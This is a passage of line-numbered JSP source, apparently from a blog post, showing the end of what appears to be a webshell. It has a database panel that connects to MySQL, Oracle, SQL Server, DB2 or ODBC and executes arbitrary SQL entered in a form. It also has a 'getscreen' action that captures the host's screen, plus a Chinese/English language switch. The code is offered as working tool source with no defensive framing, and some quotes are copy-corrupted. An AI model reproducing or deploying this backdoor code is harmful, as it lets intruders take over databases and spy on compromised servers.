1398                 }else if("DB2".equalsIgnoreCase(dbType)){
1399                     driver = "com.ibm.db2.jdbc.app.DB2Driver";
1400                     port = "5000";
1401                     dbuser = "db2admin";
1402                     dbpass = "123456";
1403                     host = "localhost";
1404                     dbname = "";
1405                 }else if("Other".equalsIgnoreCase(dbType)){
1406                     driver = "sun.jdbc.odbc.JdbcOdbcDriver";
1407                     connurl = "jdbc:odbc:dsn=dsnName;User=username;Password=password";
1408                     dbuser = "";
1409                     dbpass = "";
1410                 }
1411             }else if("connect".equals(fsAction)){
1412                 if (driver!=null){
1413                     Class.forName(driver);
1414                     if ("Mysql".equalsIgnoreCase(dbType)){
1415                         connurl = "jdbc:mysql://localhost:"+port+"/" + dbname;
1416                     }else if("Oracle".equalsIgnoreCase(dbType)){
1417                         connurl = "jdbc:oracle:[email protected]:"+port+":"+ dbname;
1418                     }else if("SQLServer".equalsIgnoreCase(dbType)){
1419                         connurl = "jdbc:sqlserver://localhost:"+port+";databaseName=" + dbname;
1420                     }else if("DB2".equalsIgnoreCase(dbType)){
1421                         connurl = "jdbc:db2://localhost:"+port+"/" + dbname;
1422                     }
1423                     SQLResult = this.DBConnect(connurl, dbuser, dbpass);
1424                 }
1425             }else if("disconnect".equals(fsAction)){
1426                 try {
1427                     if (dbStatement != null) {
1428                         dbStatement.close();
1429                         dbStatement = null;
1430                     }
1431                     if (conn != null) {
1432                         conn.close();
1433                         conn = null;
1434                     }
1435                 } catch (SQLException e) {
1436                 
1437                 }
1438             }else if("execute".equals(fsAction)){
1439                 SQLResult = DBExecute(sql);
1440             }
1441     %>
1442     <form class="container" id="sqlform" name="sqlform" method="post" action="<%=request.getRequestURI() + "?action=database"%>">
1443         <table style="width: 100%;">
1444             <tr>
1445                 <td align="right" width="15%"><%=orChinese("Database Type") %>:</td>
1446                 <td align="left" width="85%"><select id="dbtype_select" name=dbType style="background-color: black; color: white"
1447                     onchange="dbsubmit(‘typeChange‘)">
1448                         <%
1449                         if ("Mysql".equalsIgnoreCase(dbType)){
1450                             %>
1451                         <option value="Mysql" selected="selected">Mysql</option>
1452                         <option value="Oracle">Oracle</option>
1453                         <option value="SQLServer">SQLServer</option>
1454                         <option value="DB2">DB2</option>
1455                         <option value="Other">Other</option>
1456                         <%
1457                         }else if("Oracle".equalsIgnoreCase(dbType)){
1458                             %>
1459                         <option value="Mysql">Mysql</option>
1460                         <option value="Oracle" selected="selected">Oracle</option>
1461                         <option value="SQLServer">SQLServer</option>
1462                         <option value="DB2">DB2</option>
1463                         <option value="Other">Other</option>
1464                         <%
1465                         }else if("DB2".equalsIgnoreCase(dbType)){
1466                             %>
1467                         <option value="Mysql">Mysql</option>
1468                         <option value="Oracle">Oracle</option>
1469                         <option value="SQLServer">SQLServer</option>
1470                         <option value="DB2" selected="selected">DB2</option>
1471                         <option value="Other">Other</option>
1472                         <%
1473                         }else if("SQLServer".equalsIgnoreCase(dbType)){
1474                             %>
1475                         <option value="Mysql">Mysql</option>
1476                         <option value="Oracle">Oracle</option>
1477                         <option value="SQLServer" selected="selected">SQLServer</option>
1478                         <option value="DB2">DB2</option>
1479                         <option value="Other">Other</option>
1480                         <%
1481                         }else if("Other".equalsIgnoreCase(dbType)){
1482                             %>
1483                         <option value="Mysql">Mysql</option>
1484                         <option value="Oracle">Oracle</option>
1485                         <option value="SQLServer">SQLServer</option>
1486                         <option value="DB2">DB2</option>
1487                         <option value="Other" selected="selected">Other</option>
1488                         <%
1489                         }
1490                         %>
1491                 </select></td>
1492             </tr>
1493 
1494             <tr>
1495                 <td align="right"><%=orChinese("Driver") %>:</td>
1496                 <td align="left"><input type="text" size="50" class="trans" name="driver" value="<%=driver %>" /></td>
1497             </tr>
1498             <%
1499             if ("Other".equalsIgnoreCase(dbType)){
1500                 %>
1501             <tr>
1502                 <td align="right"><%=orChinese("Connect URL") %>:</td>
1503                 <td align="left"><input type="text" size="50" class="trans" name="connurl" value="<%=connurl %>" /></td>
1504             </tr>
1505             <%
1506             }else{
1507                 %>
1508             <tr>
1509                 <td align="right"><%=orChinese("Host") %>:</td>
1510                 <td align="left"><input type="text" size="50" class="trans" name="host" value="<%=host %>" /></td>
1511             </tr>
1512             <tr>
1513                 <td align="right"><%=orChinese("Port") %>:</td>
1514                 <td align="left"><input type="text" size="50" class="trans" name="port" value="<%=port %>" /></td>
1515             </tr>
1516             <tr>
1517                 <td align="right"><%=orChinese("DB Name") %>:</td>
1518                 <td align="left"><input type="text" size="50" class="trans" name="dbname" value="<%=dbname %>" /></td>
1519             </tr>
1520             <%
1521             }
1522             %>
1523             <tr>
1524                 <td align="right"><%=orChinese("Username") %>:</td>
1525                 <td align="left"><input type="text" size="50" class="trans" name="dbuser" value="<%=dbuser %>" /></td>
1526             </tr>
1527             <tr>
1528                 <td align="right"><%=orChinese("Password") %>:</td>
1529                 <td align="left"><input type="text" size="50" class="trans" name="dbpass" value="<%=dbpass %>" /></td>
1530             </tr>
1531             <tr>
1532                 <td align="right"><%=orChinese("Connect") %>:</td>
1533                 <td align="left"><input type="button" class="trans" value="<%=orChinese("Connect") %>" onclick="dbsubmit(‘connect‘)" /> <input type="button"
1534                     class="trans" value="<%=orChinese("Disconnect") %>" onclick="dbsubmit(‘disconnect‘)" /></td>
1535             </tr>
1536             <tr>
1537                 <td align="right"><%=orChinese("SQL") %>:</td>
1538                 <td><input type="text" class="trans" size="100" name="sql" value="<%=sql %>" /> <input type="submit" class="trans"
1539                     value="<%=orChinese("Execute") %>" onclick="dbsubmit(‘execute‘)" /></td>
1540             </tr>
1541             <tr height="50">
1542                 <td colspan="2"><%=SQLResult %></td>
1543             <tr />
1544         </table>
1545     </form>
1546     <%}
1547     if (action.equals("screen")){
1548         %>
1549         <div class="container" align="left">
1550             <input type="button" value="<%=orChinese("Refresh") %>" class="trans" onclick="javascript:location = location" /> 
1551             <img style="-webkit-user-select: none; cursor: zoom-in;" width="100%" src="<%=request.getRequestURI()+"?action=getscreen" %>" />
1552         </div>
1553         <%
1554     }
1555     if (action.equals("getscreen")){
1556         out.clear();  
1557         out = pageContext.pushBody();
1558         this.getScreenImg(request, response);
1559     }
1560     %>
1561     <%}%>
1562     <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=ENG" %>‘,window.location.href)">English</a>&nbsp;
1563     <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=CHN" %>‘,window.location.href)">&#20013;&#25991;</a>
1564 </body>
1565 </html>

截图:

技术分享

技术分享
